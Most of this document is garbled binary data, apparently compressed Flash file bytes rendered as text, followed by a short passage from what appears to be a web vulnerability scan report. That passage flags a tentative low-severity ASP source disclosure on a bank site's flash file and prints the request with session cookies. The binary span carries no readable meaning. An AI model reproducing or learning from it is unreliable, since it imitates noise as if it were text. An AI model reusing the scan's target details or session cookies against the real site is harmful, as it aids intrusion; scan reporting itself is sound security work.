..X.....FI..3...&<.u.....<....H...L.tenPj.m#.........9eo#J.p.......lK..5.zn.c.....].t.|..........p.1GC..G........kIw4./..y..g1B.O.Q..)."k.....[g....!..NdC#.xY4.:1n..3..@...{",....|Q...a..'G.)..@...n...'..~...qU....r_.&.....`0......]......W..*..\)............a...qT..Z1`.rU<....?.e..,.+8k.d.J.8+..:)]...[..O..........;j...tr.....vs;-]A.Z..h.1...r.IGF...v...D..8.k...G..{....nC....}:`.8..e .a..kA.q.kYP?..k....'..fPi.N.[..F.z... Kv.V_m..5..]5.{.{].............=..~%....K.2e.O.`.rH..1..E.
I6.u...)_.Ou.3...B...#.../.@._.........>.....[*..
'..<$...*.L..0.Y...=..C...N..*J...)G....v..
   ...e.?.....KI...4..................*..my4...G)%...F..Ik...j.u..W......Y.5.xm.F@PZRb..H7....[:...ADB.F....1J.n.......
..........9.u..}.......[k.x....,    .-nbd.0........5:........?).b..v..._J......_,....$.tx>l._.R2.a....0.(....U%..yb.................'..&...j.2aS.M...D"y.....fr_...].$.....1.`.......4QP;n\
..L.V....^...[........3.._.6[-..k1N....{"....[dx.......`g.[....g.l.jP;..k.XE...x)y5..r..|+:V..\.\W......5}6...h.r$.z.....9.GC.5...........f.Z.h...w%..#...Ld..GQ....8..W...~.=0o..}/.8..7^.....%.Cv".%e[....v.I*....,n.w,.@..q....$.3...Z.\..|......nN......E.U.
nI.C.....1..(..F.^[w..8...JT.vw.....................L(..C.]|..!..2......C...N....Q.J....}u    6.P..O..\R{>.O.H..ty..S.%).~N..;A6.. .v.J..2a..;.{.:....g...hq+!.[.U..QV..5-.'D^...... ..>..H].5.w#O.^....'..........&.9[.i....w..uk....5......w>.*h..Y..AM..6.D
;.c4.....N.A.qu.X.r.,.?.....?..(.!...'.\.DAKe.....%"0....]B.M[q.?.ie....P.*.P.Q.......0.*...._..&....W..c.e.~..P........../...S...0>.E.'/)....sq.^A.<...V8....D..w._K..T.$..?.W{...M...9.....:..v.Q.U...f.......e..;7.|..;.tu.b.q4.EOO.l.s.S...z..2..:.y.,..s....4Cc.Z...q.\.t.......~.z.7..)....v(..@..    .&.j..<..l.....fh..Jl.....-S.*BD_.c.n
.....]..-.......,..X........PU..*.<......dT./....H...".i....e.....I..m...b.e..[Z..1^a.!6r^A...UT....4.D.....a..g...O...){a"v...f..M+...c......I~.........g".....7..H5.FJ..e................r....W>..s....&.`...... ...... .._....bJ........~6.(CW....,....m=-_X..`.]1..>2.5...@..Lg`..:....N^].o(.p.=eD*..2:.3s....Y.uZ..F.....-.Q8A..x..N].\.X.....<..N.w.............'..8.\do..-....CM.........C....A..I....jvgFE.....m...9S.O.$gp..`^..6....1..!\L...H......*......s$...e.<...zM.}`...1R.*Y...q..{yw../........n...%5]v%K..l..z3.#y.....15`...%..M....:./.+.....;..VR.........o....].G.c..H.Uu.....i...1.3...*J3... .`..B...c...L...sm......"<.......l......Z.<@.i%ApQ...G..L5w......
K
.Z...O..-.2.../..F..&.{...?f.g...h.F...X`)4...
EZST<nm.D2..L...h........Z....[....:;.\...6|...p.).....BU.!`Y~...y...*....../..S    y.E......[P..L.e'`wkL.1U.:..a.....|.O's...]. ;..h.l..,o...h...g}\e.ib.ZY..]..:.w...b..1...Q"I..8&....j.^..6t....l..6.a..8~d.X^...{g.....d'.b...V,...FT=.Y;..Gq..[...ly......'.......
.....S.i.....q.Y.v/..5x..@4......    ..y...,...|....63....@d.t..'.%Y.7...4....Z@K....3;.v.'.z.B.........6..!vkj;....l*...L.....~......Zs...9....0cg.........M.e.V...aI..o.    .......!J.-.m3..0....M.&....vy.g..D..ae.....x...I .lm...n..6.8{...G../......eW....Dzh.~..l........$..2..........47<._....!....H^.$..)..,..J._)].R.....B....r4........q..ne...../.7..l..z
..M..S.}.......[m)t.}*.4..0..Mc..........N./..<p..U...n...
..4    4.%.....\._..:mdjH.*...`.........d.."...._....]..VQ.{.Q..ej.1-..........t..C..].Xb...?rK....e....(.F......h....6...."..s.&....a.po^.Ii....`R/;k...b..t....HM^..y.....
..P......6.[.e...n.=.I..6.b....E.N>.....K......r@%)'1
.w..M.V9.Cb.....)z.1W....2`%@.....i....!.1..s    ....Y.&0...R..c|...a..A.:..h..*U....SVyB.s7...`..|>.]..%\.Lh...:...]..t.eA_e6..Y\P.:.......s....Y..yST.F..,....*zT.[..K....3...>9.d....:aS....G..J...<....r(...o..3..p.....[&c..;.n.'7....8HN. ....%.%.$a.......4......b(O.5..S2
\.E(..e.....`...._.=....e+w|0wI.t...V2.;....v.k.w....va.._~.t.E.m.E.{.......r].5.{+.|......$...3    .2..@.^0zD..0.....[.....o.n....H~...&b...X.SdTi.5PS..-.O..{.s...>1..l...Y..IE.e>...jOU...z.x;Zi.a...|u.;.2..|..~.....|......./_U..].a...7.l?..T."..2.e.v..B...s.Qb.A..9}..... =...Bo.,..t.    .).....Xls.`3..$/o{.{.=.....O.cS....Xd].t.!....8.My.>U...)+/......n...@.F...8.h..m.x...L.H......0... ......=...^.;.....aZ.D.8.e.;.|h..\..
..5.8
.2....5=.5....Yi.Ww.....U.....}p..>...(.Em0.`+........O....@.
KS.N...G.....{8}f1;.......O.....w..X^....-..T.j...oo............}....p.jV.....g..d......*../M.....-D.{.D......
...w....HbFS"0.P....l.....K....H.0q.W......_^.G9...u.+HBP..T....P.A...X..L.....^`Mf.1.z...P0.gFF..&...m4.a..P.F.s....Q+X.i.......W.......9..:.../O:=..E.n..3:.o.n..;..=.:.....9.b>.c7UNq.........'..Z......9g.i_a.cy...J...?Mik.F.nx..B...?..B~...L..H.&.cY.wRV.bMc.{...t..[J.V..v.......?..............
.....U..+I.q.D........Q.\..=.us7O..3M.....o....1<.../..2..Cy...fTMtG.yKd...E-..TK"....[....F.wv.....9|../..gq.m..T..x.j.iu....i~2.........]z-...    6N.(.eI..?...@...~
...FZFN.T|.da..W.O./...A.*....1B.T=.U............rc:$..)...R.p.#~h.3.~=.+Q.!0Q.9..:...p...U..0..c...O'*.......eR...&.!j.c..0h4...@..|J..(ZR.a.;....W7.w`O...V.k+
E..=....&..$y(....6{qX.rB.h.hD<Te.9.....Z..7.g.q..j....Y..._...Y%....5.~..;..V.a..%t.o.~.
............Z~H........pi...=....^....B...>..].7..D............|q..d..~9Vjj...DI.WF7...:]....]..rv.%.....&p-....8.W....3.Y.g
....R....P"V=...$r./O..
........%.t2?.Y..K. .J.@.{.M7N..$L..c....H..1p5...d<..l.=..).3....F.<....@....a..X. .R.Fl..**0G.......|..*b..1V...ES.KZ.=].#@b.J....|d{8..g.F.....M...Q....t.;....L....t..........G...Z..|.>..t......jB;,X..h;......-._...@........z.Cz$'..m.J..1../z..\..@G...2..,E.......T..:.J....j.LD!..|[AHtj.....fKtH....C..l...~"...JV.    .._`.&..-......]D..5.J........*.............e.}...........
.?..du......8.$P<.-.t......a.8-..M...{.\A..$...@..jz...I....wg....i....^O......    ..o.}x.._.....,`..PM:.W..\...Y:<Y0.fa..W............kY..:pg....t&..........>...........c-....fD...$....0.Tb.9.54..}...x......,...;.....\3*i..I.D.U~...........Z..#H...l..|.x .(...k...[O!.<    A...    ....V.....w..W.u.X......q....>...[..\q....TG.DP.K.s....IJ.(.J.#...H.y!.0.~.nm...`e-K..cc]fT\R.+..H........J.YC....fj....W.:....R......c....S'.....[v..7TD.l&..2..G.........A[f........$.r    .....N>.........O...)....K.6\tH..7.....FyI.H.<.<..J{XP..`._.q..].M.....0`.<=..E..bo...vj..a.U.,Z.z......
.9..=..%...E...D).O...4_.e..f2...b.f..X............_.^..{
h.iw..;'8.5'./.9...;.j..R=..+:,4.../....q    c...........e.d.e.pq8X...<.Q._n.. B.........Z...{F...S..%..$.j...V.q..d2.L..I{.....NM....u..)..x"o...YT|W...hq..*$O.G8.]..].X.{....3^.Y..4H.CD{.....A.....A.....t......a=#.i7..>I...e..q.#;..<.....d'%........\...Z.~^....@Y..<..C.$.G=.v....u...i.[....e..1T........:.&.H......U...b..    Aqo....pY.<.~)sd..
T....g.-u.._.#..1................t.m
-.....zXw.....2.w.j..."d..a....c../...T....#.......-V]..Bz/y.a#.....:.....o....Xf[..;......?.....xB...%2&6.....................T..[b.HT....]s.t.........4.o.AP..@.~........N..P8."g....C..."/....Z.
.U.4C.(ap).]DA..IhN.X7..`.uF6H*F...n..<..U....pQ...L.X...S..CX..7{..Y...`.t....FC..xVm.P.......7$.A!.......+....$3..~....>J_..X0..3.......A..2....<
9o..'c..v....[...|...-.R..F..i^...QF..?....R..-O.w.F..y#...yC.f.^...V'M..{b.s{....B..l....L].....U.....~.....0...:.d..x.'.....PC~.^...6X.U......-1.8.^.<.M.1...F.9Y...Qp.U=..7,C..,[..{h.&.&.xv&....0...O.jD...CgO..R......$....f....`.C..N...S..\....9....i.......,3.J..3.'7.....Xp.d.u.d...LYP.......I..N../.*.v}We)...hK.=G.......R.#^.....Ht..Z9.)..0..Qf..0...r....0..;(.OI..t`q..t..[............x.'...D~+......B..G...xK........k#.N..F.,2..A~.....e....-..6...J....O...M@.y_..v...@Pqt..Bkg.........w..E:....>...........rh....2......z...<..w.Je.yW"..c.\.h..yf....J-.&|0....3....v...L+..8|67.|.g......b...A.{...9.*.....Z?._z...uT...'...J.:..:RM..y..!L-V.....e............^..1X..../7CV....c.....y....
.~H.}....;%7...M}A;i.M.....K.(.l^lJ.zVjP..Qn.AV....2.7...}...........&....%.....&.YD.j..=..6.....k.3>c#...bW...^.)Hwd..g+\.-..kK.c
1@..w}tx...U#UyM&:.v..y...2..2t.....)<O.q$.}.!11w.0Pbi...C.......u.*8..X].y.....ls..'[_.. .Y../)m..N.".......t.#.;{@....;...*P...b.T,...@3\...1.~ ^M..*..O.f.jmE..q{.....y.\.D.w.74.(C...j'...4y.\...Kb..=.....X.I.............e.+........K.d...&m..US.'>;f.7.:..BA..K.^....7j..,...vC|....r..0/..b:.qo.C......S...zm..
E.`(]..j.gVM.>..i.Ee......7..0<.../H    ..?.X{.....l....W)...>c.A..3O.R.*...{N.V.P-..V....Txm.%n.K....Z.}-.*].....3.w...F[.4...r..|...1R.._x......D.h...#...h...;.....".)Hl%....9b.Z.......5..s...~......".0....4.5v    .p....~.....o.W2......]...r....Vi..R......+.I.b.kB.....L..../sn..d.....h..wE...Y..1..s].Y....$r^.w!<(d..W;..2...4..u,.y.U..^.e    ....>.1...3..J9;..a..G........ T...    ..~.\.k.4;.......1........o;h....._.J..|.....h./......:.2.....z..[..?.s$.p.)l.._..bl....i..sdT...[...f..y..e.....~...c)..LdF.....Adm.o......5.Q"+.......>..N.u!.g....w.X.K...r..n<../.j..;. .....3.e"..E#d...}...9..h.j...[......G..#Y.....(.K<..Y.XAs.    ..7.........F.3.p....b8|..z'{.~....I.....]}......F.......][u..{.,OHQ.......=a.&"x..'.c..i...@..u..4.o...-....l...T&.kk..4..o.w.c.h......{.C>...j.+.3...l!........jI....z.iM\.<+..9.(.Ai....S.....0...M.W@if...O...`...1.*..D..j...Q..2i.../..,%.u..DM.N..~[.$.v..b....#...d...........    p.u&...hS.G.4.#..~ ..t.%B.D.L.v.^.TkL%c.v..DX.(..3.U......#.......NZ^.=o...>..EkNFJ{..E.....9....Oy.*n...l...E.O.
"...w.h.."+.....},.;..8..2.9.........A6.o.....q<.....z.    ..;...5.-zI.-.$...#.._.T.`._..#..l...Z..7..&..$...em.z.K.1wdl^b....!.mQ....'...0.....X.g.f.....@.k...$..[.4...O.fj.....$...^...^.N.....V.....h....}3;.f/.....bH.{r.....C'0.[.s.q9f..|..(7........X.........U..p-.R?@..."...-.ff..L.}@H...Tj...7)MKY.N......JS..g.1.?.-.Q.C.............]..O"J...!.....=.`..X&.....TEC..F.D..}(.S..W}.(.#(..s......R.m~k'..r..hB......o..axY..W'.<`.MZ...^..s....w.].v.."{.;.a....0...c..c.......d.GQ.........:..l.S..@Y-..E.e.    ._....(.6?_....Y.=)f.....&...5.%.........q...Fs~..M]m.........2e.......g...#U-x4.Z....D.......qN..L]_m.W.=...T..:l".".y4 <:...Q.-..\.a.!6......rN....m>..|.D.k._C.Of.._o.q_s.y.]....~G.........1:f.[.Q...).#.S.A..RY..!...[..j3..;....&.......R ....@.v=......s.]..l..k^....y..9#.#>>..J....5.........V..[...M.....?y./...C_...2.F$h....Ht.B.?.......R:.YS..p..nEA..8.('D.z0.c.%\.....-.0d....l....s.%..Z...&.^.Gd....@.>.Uc..n..5........lu.5B..I...4.^
;O.:..>a..../...Xo?c.z/.....,l.y....A.......R=.S.H..b.(......i...7.....:...I]..D.<...85?g...N..5..j=..T..n.B..O....[.....u0...m3...-.gj....XQ._.......U.w!<......Z.4-K...B    .    .....wE...2.n.?.|gWJh...U...:.g.....g....h..e    ?...f....
.L..."....-.    ...oQ...........>.[.{.+..R=_l.3.........j..m2........RF..4C3h.$.$.f .3....o. A.:. ..&#w.T......f.....g....l..@.l..<...\.@..wI.b.*J:.-.P.....i......9..)..!=.NCI....Z..d..g. Q..Du.Ni.....\.....p/.3>M...p4.#.....XtB..C$7......0).l<.Y6Z..RW.p.......Tg'7.hs1.(_+w.].jZ....Q_Q...".{>.R..-B.|.);qP*.]...._Cc....[.+.}~.....C...
.y.Tn..    7.r(........1...d!...r.......vn....0....`.?..D..i.b..Oq.|......1e._......h9...T|..?.Q.t.N..F.-...%.-.B.7....X.%w.0v........g... .7..)..x........Cr.....P.....Bk.zd..... r..Y.>..Q.....R.H.&xI.kw8.W...bK]GeZ._4.R^..=b-.m..H...3a...".......':.]..es..J..t......NX...'6..O.!".....t.[...c..8.Pp....u.G.6.(.....y..|_.E...3u.s.m..K.%D..r;.lR..Z.!.ek..K........h...j7N_3{..{!$.Q.....[.......    .F.N.f6..[.~m.I..@.:_.3....?/Z.....:.G.w.6.OE....W=+HZ.T..p...i.FS.....B..    .&.n.h.B.....;.1..._&.|....J.n./............d..n"....K...?.`.Z.65).]L{g......d..l.v...F~j..... .B...E....<a..{-...a......Z5O...\=.F-..0'.S......_.=.....^.......z.
.g.^......)t&.3.y...dy.Y.Q......w`../.;@cdx.Da.-e2."..,.....%.0c.Q.8n.....!:.;..pw.c8.|*#...I..a.J.....,.rw.!..o.9.!....9.._..G.8....L..@.`#.>.]...g.@w?.z.S....E...|.....K..F...ba=Z..U...D....;...Tz.{.3p....@..A...[.7.1."ZI.Q.x...U........Qr5!..........Yf...M.|..._..m{f.IBk..Z...".B#......L..........F........7.......E.@+|....Akpv....r:..k.......+....:f.....m........T..:.R...wt..y.."....E.....pM.%hJw.....p...ap..-a4...`Cn...6{F........W.....6.c...J@b.JLj...v......p..._*Jz.H$    d...T..#>../......Ui.......)L/..?..1e+.o.9.6nA6a...`).*..ct..2.a..3.l....pw7Z...b.3^...(D....e..$T.Hc.!7..f..G..c..zb'I.-6........'.b.l_..0+.........y*...+xJ.g........w...."..5..7..'..:EQ:\.K.R..om.a=.~t......[...^.Pc.>.(..w0.M-*...3G.F...Wt.[.6tO.K.#.d..]..62...)8....'.5E*.e....$$..j8>J.3.X....H....H.....<23M5.6Hx-.E....H.J.;}"f..,..A.Q..Y.z..V3....1.NE..^...2..\5I..b.L..9..f-.h{..W0Xjz.+.z..@...Mp....x.j/m...Y
.tI..Ys+,a19..!.Il...K..... ....C.|..!1...%jR..C...E,......aB&Y.R....'.Iqu.h..fL0.......Jw......W. ...D..?k..0.:.\Q%....B.I..[....|`,....T..H..".$c.....N;m......l...J].AG....Qpl...fh.........#s;...s.:_..X..U.n..z.U....P0+`....".s.[R..d..Vtv#.......C&."#...;u..P...C.gM]...kOG$.....w..&E....p...o.*Z.7~.f=[......9.....n'....%Iw....m.Z..'3..<*    ..4./`...<..U.....}W..9.a++..m
.x.*&..6.~-y....~.:.Ue'..p.w1.O.....^....F.e....(|..DO........qh..._j..].G...|.RG+..7~%SY....W._.:..L.0...a...R:z...I....Q/h.....    ....v.=..n,....h........*......e...]..>K.g.|ww<k...9..xF.lUj......i.".7.EBd..HP|...5.1.....3........yfg_.a........i..C.WI....E...TE    .%.[...$.f..........r.I........W..P.;jd./nC.s.......R.oh.,..........J%.V.F.=.....!.*.S.......5......'.
../.3.]....6M........vR...KZ....(......M..Z.].zE...e..FtG"....R..B.~...,gp.8j.V.I_A.m.x..S.....S|.*.D...p.xgA..M..1.......T.YAb.b|g.H........~xs.77}.....&...Q...q...DQ.....v.J.b6.be..K...w......d.t..P...;l.C...);...[U.#........HW....Q^..b?.Q.r..I..0UJ.|.]V....].^,....!.V......)b~a......{bS..m..>.z.....Z.....&.......Bm.......t.S........=~.9.7.2s.....H.`.a*...I.Y.f..R........;......v.l.uP.H..x.X5v.#.oV/XI.F......*....9....D..v...|N....(....HY.M..u......w.b...W?..!1;5..4B.....*....=._yQ..nX...P8..l.s...Rv..5~..h..7...!y...k...~..p..Zq.)F'0'..F..e.?{|.........E.0~....S..t.]^.i....:....0...4............P+....s.....N*
.`....I((Q.m.N..Z^......q............X3./WXI.5i.N,y.......U...t...i.f.5.w.5.....q.......r%$}v...'~...st.3.|.!G......'..;q.i#........]0.a.(c....*.Z1.F..T1..4. &.X.W......r^...!X..h..-..4.b..h%.. Y.......o....dZ..J.2.2..6p.f....0!}../KT'...RJ<.d.|uK^-..N.~..n>/.....I..MR...gR.h#.2....x....Z].e)...f.]oSfN(....BXh<%.F..NI~]F...!..f....K3[Qq.JO...#...0..J..r.f3.h.`....8.,....U....t.....6..e.F.B.b4/~.DIM.y8......._.h9...._A.."#.    E.....Y~.7.s..N...I....I...../...v...J.....|XQ\....K....%.ba.......Y.4...+.......X.4.Z....(..\V."...b..?....:...H.?=..+.a.....:3*i......<....B...    [.b.....y5O.z.......8..:.<...}s_ } ......nR.{C.).....IY.T-.er.......g;..u......s...#....`...yUg..+...`.}WH.....oD..?...F..Jl..REK........=..0F...A.N..W.kJ1j+LC............].vg#...i
...^.......LY"...3ga....2U.M.7.d.'..s.bu..X.....D.o.%q.|~!....B.V8nW..-.wN..M.v..8.0..........q=<{.H<.....F..^..m'..J.rC#.D..j........*...y......w.!z..<..DB.$....O%uQ..}...[.........\).gj;.7....m....>....Q....6
.y.P....X=....s......,C..E....'...h....QK..*..&s.W....&...j]m....+.].NI....J..    ..^X./....{$.b.e%M&Dk
Q.8.z..k..NW......t...S)Yf.......H......4.........k?    ..5i...i..X.Le...8.,...4.....[`.(...Q)...........y.].....V..<.[.....C.wiD,h.L.:o..C.>{..x.....w.4.`..c...U:..Q...;j.x7.d(Z{m.........w{..&.................+.kS..q.<.....pZmU".@<....y6.t(....:M.....f...N...Y....t......#.D3Jh...tm%`^.r..3HM._...T.q..%Zu..RUQ...s............*..8..ljU..b.........u..j.../.....7.../.L4..Uov.-..&..s.)..0.B..bS#.:"../.w|.....?&.&.Y.:.\@..8ac.
.&..u........j...tP+...b.a.^..w..P.r.P`...u_.lh......L.Fp.(K|.%..0.&i,........m..;....R..m[<N....._$.9.....m.3.<...    ....K.n..h:....'.X......3..K.DK>....;...\[%....0.....?=/.p..RHf ....pg........{.....<..u.@..~.+.T..QIY...K.\.....CI....e...................p".......&..k....d6..Go....
......,.W-( `.J....P.SH;..j.Q..oq...i..t.E.v$.z.X....R.m...=..V.x..............My~..|n..=...7..t...Y.n....C........m1.J...L9..G.RYy!.w.....`U...WH.....X.....&+...k.>..e.yUd.$3.%)...Z.FR.._~i...fgo.M.'.0...`.....V.y..>Yh.:.:.......8|q...CT.G..s..Q.....[..........V.X9&...    .v..Y..I.+".+,..$$"..(<\a~...e.R.."...........H..C...D..(.n.._M.(.}.[.7|......b.....\n....@.Y...P..`.X.z..x...Q    ....~. ...ml`:S..........Tf,V..fH....B.Qg.....g...    ...n..;...L.5b.#.+..w...m....T..=...eH{.......j#..)..4....f......d....M....a:1...E.......or....'.A..3c.Og...m..7.......'.J.\..j.C.[k..4.....|S...2o.......R&..^.e.wu..!()TH<.u..C.5.%.a[..C.../.....a...t.W.)....z)}nwV.....V.;...eK.t.qVwC.O..D....B..-a,...0..C..........i+.4....r8.<E../....../.8...R~z.<...Py*.(e..<.t..}m.lxr......RJ.}o$E.gR..j......h....a.'Py.y.J}.H.._'....M.x........U&....|..>.Q..S9...... .z.a.bV..|.B....ERX....L_...*{..%.E..76+mh..5M..{...U....=]..&....$k.le...tw8...9(2.....)<...auNm....J9qCol<.......i.v..1...t......_.8...Z./.R.hw"b..f{....BC...V..A..#)..B.............3..
...z..mX.\.g...(..i..=.:..............o....o}..~.    ..j...)..e..N...............
.................o..|T..?E..+......K......rA...P.8[..    H.v.KXni.H..X..=v..?.;[....zCx.......).8q..D.0...H.%.:..D....\......#..CmUP%V.k./.^.I...m.Y.._.Ic..b........Y.?..j.9._[:.wqj@X..nQVV.i.!L9.`$_ms.0id.m.:....+.xT.if^$........g....3.^.#.|.gt".".'.9.Z @...........g.......}.*..R.iQ.FY..zkt.9..d..    N.....aL^....
.xq...'..N.-,..X.T[...Z.......T...5wR.....A......g.~....V5..5axKS.Sq#.....B...C..f.    6...ZgV3.!.,^....._.~w......m...Qe...).b.....4.oQ..j+v.......h9zs.R.R...k:.(.W.t..>..X.4X.xM............F...yat.sq*t.-..C...pX..~.D]].uZgc5`.p../i....U.`.    Dg....X..m..-.w..Q..$..W....B.W.j...w....T<.5}.=."Gx...7.S.:...N..H......>....:.[.....[..ikR.:..]5...u_?].x./....<.</.........z.a3.)...Q.u..@b.......[...+`.5....:..1<.2_.^v>F.Q 9.|...L./:.-~.;........<..`......M.*....@..]4/..)Ew..$\...K....~.<..}.O...yM....[Z.%q...
.-V...fO.o67,..%....Q~V;..z).XG..tT...V5..u1...&rW.-....K.c.....    @.7qF..Mub..A.2]..]...h.S...?.D}E..a..:.R...^[.........f..d...$...+'..J...u.&...a.p.l..6...#-...N..U..e....&....,..Z.mjn..P.JW........C<....;h3p{%.....';.X.IIM..x...L..B.....v.......C..L.....}......q!!......g.&..>.U)M....9...w..v<u%.9u4.    U..K.....M.A..'.Y..{N.........b....C. .H2.. -.....m.g...k,.Vn.B..Yx..d..u.`...RTI...`H".....b......Y..U...7.....P.    .RH X.6.o[.+.r..@..............>@.[l....P....W......b....c;.LF..qIDv..-...6......|...,uB...}d...abV.q+.b&K..x.j.hW...9...........sm?.>.$q..8..&.]..U.!..    ......1.U{..9N..C.1.';.eM...#.oQ#Zu.a$.Y.....oH...W....MF......|.K)....m-....,xWV<j.s."......3..$`....#.D@..z.+.....(..*EU....p=...(De.8..T....i<8q.e{.....Y..wr{...ar9..h~N>.f !-..{.a......1...S...O..A...r.}..ex...........#O.k...|.G&;']w$.s.-..0.b.[z3h...6..&..ox.>......tv..Z......P.30..Z..&..Mz\.mbyV    ..w..\[.6..nf.c!...b..-.t...evR..>.a\...[i.X.+j[[....n....J,+...y.:.D........YN..5}.^...6...pX.tyq.3.e    }.*+$.6..h.sGX*.....N..    .)..!.     ....q6......~ .[d..-.....LVGr........)h(.)....B............:..C.\....L.w.#%.."ip.YXl%.+.I<..wc....d.....vnH;....n.A..[..4.ln...Z.Rr,..N..%@..Tv.m.........\~".;y...j...m.>iH....n.Ec~}2r....%.... ..K..........i/...*. ...y..S.{5P......    .....Dr.7|]A=E8....*..kdp..9:+O,......5.W.qQ>r^.#......j.t.....[.Z.1y....-.....y.x..zd.).T\l..a...o2.w5.m.....-...V..-    ..5.`@...'..:=.c3.L&'rM...:...FU.y..n.....[.....=..x.{;.."...2.Cz....@...*.>.i...m..rc.t>.BX..%......._.~o..J...yS..R!..Cr[.b..!g..S.......lH..?..JdC........+.*...\<.m.....W..n...!...J..9.......BC.Y......P:.,x.v......fc..o....1v.{uc.....w...Z....A$h.]a.9{.`....%..l/S..&.(.9..%.d....l~J..[....b.;...3s..........d....Pl.P.J..l.@x......'w.2*...*\.pr.E...&.......9...CKZ.t!.->...
....Z.S3....g....#.V..nx!H...5..V......i)*.#\.{+..:..MO..../1.X..y.Y.a.~.../|.......V..M.W/.ii.n.........ngbR.M..........    U...r....g.._.Z2....W...1..n....I+D`.oo;.........1..4...<..e.w.s..D`...M~...4.p.j..CW.i.....-..q1....>.m.....m..c..:u.XU..WN;Ukc.../P.......A.{.:;..D....m.T.YZ.....B....s.T.....vc.Z..dvo..*.a..pry.dy.On3.T.~O..%..K.j&.:.....!......M1.....X.X.g..aS4...m(...y.U~.....4.2..#......1..'.+...9...*.).......'.....6...P.L    ..X..!.lhMGS(m1.T.A%hQ..B....y..m....B.q._r.P.......8....SR.l..-B...</.].....Y.<x..g.`6.E.'..YI...a.$!..jJ..j%I....]..NQR+J'(I....H.&.S%....b..!...
....
X.A.....M>.L../qMzt...q.......K<......bM.....Q..nH]...-....x|S..i...R..%.R..,R9.....    F7..5..i..^T..:..0.)<..JJ..Z.......#.....`........N!..J....ls.5o+D.
d..j~.....ck...R.....N.ZB..R.YJ.+....:..q..e..7.Q.......:....Y. .4.GT)\O:...[3.b.:.9O.6.\@.8..... ..q.G....6I..e...$..jC...{.).....4...n=...O.~.U..
^..h...Y.........y].....9.......@h8.l...&..xy.k+.Q..
....?
..-......w3.3;%...RNE..%..A.....&.}.,A.....v3...O.Y..1Xx.;......u...E|oY..<.......g=....r....v>....'.....YZ.S..6.E..H.zb....v.%.n..6..Lf.\.#R.e}....n..)..):)Nz.U.g.....y`6........>.J..a..4z.....;t.bj2;BS)m......ujRt.V...{._%.U....[e1:NK!..'..Cz..0B%.y    .P..    J?.yR..1.h.{{....jw.y.FO*2?)"..ji.!.Z](Kj.HJ...(...5.......3....&\!5..p.....K.0.Q{(...........-..1...Lt.eQ]...p.....}......1.-....e
.?.T...........%.v....A<..Y.%.!.{.......m..v..W..!2..%.u)....5...>e.~Y...0.?......@.%.b,T6.kYHi.-.WI$.u.o5`......r....|nm..^...S...Y......,..|,M...n..*.Hs.....K.+g..a..Ne..,......o..YC....r..Z...h.6dE....."..+?3q..RVAH.r=)<.5.E.~.v.~=..[...:....0.jB.7u.V.O..........1..R...#.......u.......v.G.T.....t'Zt)^....8x....d.=........&F..bd.J...    E     8.{..E.........T.3.k.....'./......o...Ma. ::.u...x....t/.(1}.+..oM....^..9.Y..\...1.4Jm..O ..^5...X.....U..w....m.....>m.P.R.^X.hU.....~..>..T........}...V....|..*..hJP.....O...pr...Y.1x.Yg.3sn.&?qb....n.iK..z..|Ka.P.6.......$.5.....,..'...;[u.1.Cj...8........L....    n..)JR........#~%....MJW?..;.n...~..c.......[C.tu.ur...Wl...1.-....e;..r:...4....#..Kl....r>f.{.[......:..........A0.......{o.......$..q./....$..{f....w........6T..kh4.U.t...h.;.%...n..,x..{ZV..s....;=..pb....5........[n:..)..S..JS..]?[
..|.5v..<.....H...OB..r1.gR.............I.m...~..[.......6......+..
....iE.u....(r*..}+...OtJ./g...?.9eA.8...aE.B....BT...(...........:.%.;I..F..'Z.R.......o.I>5y.=...L{..H).....q..m./.H.mobn.I..8...1d..[.6f.................M...k...-...    .Wn.........Y...M..y.t..T..!..AO.R..p.V)5u(...5..`;....L;7..n,9...Z.$,.. 7.@h..~.....qQ....Ce$..10[_/.....=_.*...!.[[..!+H.QHM..'..].u..c..V\..O.>a7.....$.O.! .4....ajRRT.A..r....U.*I.....?...K...)..YX.s
^5...--....%.....YD(.......'~:...2.S2.#gb.)....z6]...a.d$?9..}..eC......>......uV......=..{[jJ.3.y.c1_...PR....AijC.QR.x.j.{:.ha...1.q...\.D.3y<....B&...[nt...)H.%>

$y...G:..2[D.#.......Sp....(.2..-.....z..P...j#.O......./{"...#...X.N5{.31jTV..
.t.J6$.-..9Up..fT.....{o.X......\m*.64WAV.p>
...[SNIP]...

18.6. http://www.ktb.co.th/flash/e3.swf  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.ktb.co.th
Path:   /flash/e3.swf

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /flash/e3.swf HTTP/1.1
Host: www.ktb.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktb.co.th/flash_eng/ktbslide_index.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6029AA1259F59A457FB2F7A2587C8B4E; _cbclose=1; _cbclose6897=1; _uid6897=F468DC21.1; _ctout6897=1; __utmz=54991601.1304441094.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Krung%20Thai%20Bank; __utma=54991601.999704112.1304441094.1304441094.1304441094.1; __utmc=54991601; __utmb=54991601.1.10.1304441094

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:45:32 GMT
Content-length: 176514
Content-type: text/plain
Last-modified: Mon, 23 Aug 2010 09:06:49 GMT
Etag: "2b182-4c723a29"
Accept-ranges: bytes

CWS    .j..x.|.y4...?...X2v.0.]J5..3d-.]d..."c.,3d...Na..lY#Q..Lf...a,!....|........=.y..9.y.=.s_.>...........Z/ ...q....pzz...~.......s.....!.b...8....a=|#....M@....8P.......#..i.!................a.?
...[SNIP]...
<.vV.F..oq...ml.R./....w./.Iw.f.{S....,=....b..ms...i.....O.i..^..=.....O.NO{...P......67V..N...{.k...L.N#....wRxHj.GF.].>OC...mmY.a..".28..qn..W.0.R.8..-F.H.6...*..w2a..=.(0.Y..Y.H...~..R<%.]....R...j.Z.....ZY5.Xs.x..7=.W'....S#}...    .n".......:....6......_...-....H.s..$&.J...;!a......O.:m)V. ..06...>F?.{.5u4. .[;.K.;@..m....).']t.X.8...../...<.y\Vn..Y[+x-....c,L.B....H..ZGz..-*.6+....c.,....u.....UHhx..=.....T..YBn.....
